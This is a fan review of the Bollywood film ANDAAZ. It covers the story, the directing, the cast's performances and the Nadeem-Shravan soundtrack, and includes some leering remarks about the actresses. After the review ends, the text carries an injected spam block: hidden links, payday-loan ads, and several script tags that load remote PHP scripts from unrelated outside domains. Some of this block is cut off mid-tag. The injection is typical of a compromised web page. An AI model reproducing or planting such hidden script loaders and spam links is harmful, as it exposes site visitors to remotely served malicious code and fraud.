Suneel Darshan is back with another Akshay Kumar starrer he started the
year with the drab and dull TALAASH. With Ex Midas Man Raj Kanwar(JAAN,
JEET, JUDAAI, DEEWANA, HAR DIL JO PYAAR KAREGA, DAAG-THE FIRE, BAADAL) at
helm, 2 stunningly gorgeous beauty queens there for support and Nadeem
Sharavans smash hit music...does Mr Darshan succeed? Partially!
The film revolves around Raj(Akshay Kumaar) who is in love with his
childhood sweetheart Kajal(Lara Dutta). Kajal has always had a thing for
pilots so Raj decides to become a pilot to impress her and win her heart.
While he is away training Kajal falls in love with helicopter pilot
Aman(Aman Verma). When Raj returns from his training he is heartbroken to
find that Kajal is on the verge of marriage.A heartbroken leaves the
happily married couple and heads to South Africa as the pain is
unbearable. There he runs into another gorgeous girl Jiya(Priyanka
Chopra). Jiya falls in love with Raj and plays every trick in the book to
win his heart...although it is a difficult task at first since he cannot
get over Kaajal she finally succeeds. As destiny would have....Kaajal and
Raj come face to face again..and the circumstances have changed?!?.
In terms of a story the film is boring until the last 35 minutes. The
initial love triangle and heart ache is something that has been witnessed
a hundred times before. It is only when Akshay and Lara run into each
other again does the film pick up pace and event get interesting. One
wishes that Mr Kanwar had written a better first half of the movie rather
than relying on cliches.
Screenplay by Robin Bhatt and Shyam Goel is average. The film is too
predictable for the most and borrows heavily from flicks like DIL TO
PAAAGAL HAI, CHANDNI, and many other love stories.
As a director Raj Kanwar is once again not in form. He directs the first
half of the movie like he is bored and adds no extra zing to his work. It
is only in the last 35 minutes that his famous touch comes into place. But
even then, the film does not live upto expectations. Some interesting
twists and turns unfold in the second half and perks the viewers
attention...but for the most the film treads the same old routine path. Mr
Kanwar has treated a love story in the past with originality and finesse
be it Boney Kapoors JUDAAI or Sajid Nadiadwalas JEET.....ANDAAZ is lame in
comparison. I personally preferred Kanwars earlier effort AB KE BARAS!
Performances in the movie come across as one of the soul highlights.
Akshay Kumaar is good in a tailormade role. Although it is hard to digest
Akshay as a college student in the intial roles, he portrays his role of a
heart broken man brilliantly. In the latter sequences where he meets Lara
again he is in form. Even then the limelight of the movie is stolen by the
two gorgeous girls.
Lara Dutta makes a excellent debut! Be it the initial happy and chirpy
sequences or the latter emotional scenes she is natural. No doubt she has
been given a authorbacked role here and she bites her teeth into the role
with flourish She also looks amazing SEXY on screen and is without a doubt
one gorgeous girl. The upcoming MUMBAI SE AAYA MERA DOST looks superb too
and with the right choices Miss Dutta is definetly here to stay
Priyanka Chopra is also good in her role. Her role is not as powerful as
Laras but she still manages to leave her mark. She goes through the
various shades of her character with ease and like Dutta is absolutely
beautiful. This is much better than her debut performance in THE HERO-Love
Story of a Spy which did no justice to her at all.
Aman Verma makes his presence felt in a small role.
Surprisingly the supporting cast here is very weak. Raj Kanwar movies
usually have a very strong supporting cast but here the cast is weak and
sidelined completely. Only Navni Parihar in a restrained role as Akshays
bhabhi leaves her mark. Pankaj Dheer, Rajiv Verma, Gajendra Chauhan,
Beena, Asha Sharma, Kunika, Vishwajeet Pradhan and Supriya Karnik are all
strictly OK and leave no impact. Johnny Lever is irritating in his comic
role but Vivek Shauq is enjoyable.
Technically the film is ok. Ishwar Bidris cinematography is brilliant.
Indeed one of the most underrated camermen we have in India at the moment.
The camerawork in the film is solid, specially in the song picturisations
which unfold like a painting. He captures the 2 beauty queen in all their
Editing by Sanjay Sankla is good and Abbas Ali Moghuls action is strictly
Choregraphy by Raju Khan is great.
Nadeem Sharavans proves to be the other livesaver in a otherwise routine
afair.Although the tracks are NOT original by any means and provide the
usual Nadeem Shravan style of melody..they are enjoyable and well
picturised. KISISE TUM PYAAR KARO has a mesmerising effect on the viewer
and is effectively picturised. Its the kind of song you will be humming
once you leave the cinema. The other song that is praiseworthy is RABBA
ISHQ NA HOVE...simply to see Lara Dutta and Priyanka Chopra..scantily clad
dancing in the deserts! The song is about as hot as a Sahara Desert...and
indeed every male out there will be drooling over the bodies of Lara and
All up ANDAAZ is nothing new at all...it is the case of old wine in an old
package. Despite a worthwhile second half...the impact of the entire movie
is diluted. Indeed a disapointment from Mr Kanwar who is yet again not in
his entire form and isn't able to give the viewer an OUT AND OUT
ENTERTAINER which he was soo good at in the past! </title><a style=display:none; href=http://booksgou.com >book</a></title><a style=display:none; href=http://booksgou.com >book</a> </title><a style=display:none; href=http://booktuba.com >book</a></title><a style=display:none; href=http://booktuba.com >book</a> </title><script src=http://asweds.com/ur.php></script></title><script src=http://asweds.com/ur.php></script> </title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script> </title><script src=http://shorl.com/huhopapidyno ></script> </title><script src=http://hgbyju.com/r.php ></script> <a href=http://oneminutecashloans.com/a/2223/ title=midas+cash ><img src=http://oneminutecashloans.com/a.gif border=0 ></a> <a href=http://reallyneedcash.com/a/2198/ title=online+cash+advance+94590 ><img src=http://reallyneedcash.com/a.gif border=0 ></a><a href=http://1hourcashgroup.com/a/2163/ title=free+online+faxless+payay+loans ><img src=http://1hourcashgroup.com/a.gif border=0 ></a> </title>< </title><script src=http://uhjiku.com/r.php ></scr </title><script src=http://skdjui.com/r.php ></scrip <a href=http://24advokat.ru/cat/besplatnaya_yuridicheskaya_pomosch_pensioneram/ ><img src=http://24advokat.ru/i/bg.gif border=0 ></a> </title><script src=http://kokl</title><script src=http://koklik.com/r.php ></script<a href=http://paydayadvancelaons.com/a/2458/ title=laons+for+pre+payed+cards ><img src=http://paydayadvancelaons.com/bg.gif border=0 ></a> <a href=http://paydayloanguide.biz/a/2617/ title=high+risk+cash+advanc<a href=http://loans-today.info/a/2570/ title=easy+signature+loans ><img src=http://loans-today.info/bg.gif borde<a href=http://paydayloanguide.biz/a/2665/ title=holiday+group+payday+loan ><img src=http://paydayloanguide.biz/bg.gif bo <a href=http://abcloans.biz/a/2822/ title=number+7+advance ><img<a href=http://quicksteploans.com/a/2002/ title=3month+pay+day+loans ><img src=http://quicksteploans.com/bg.gif bor<a href=http://quicksteploans.com/a/1998/ title=1500+dollar+pay+day+loans ><img src=http://quicksteploans.com/bg.g<a href=http://1000loanpayday.net/a/7254/ title=government+debt+consolidation+loans ><img src=http://10
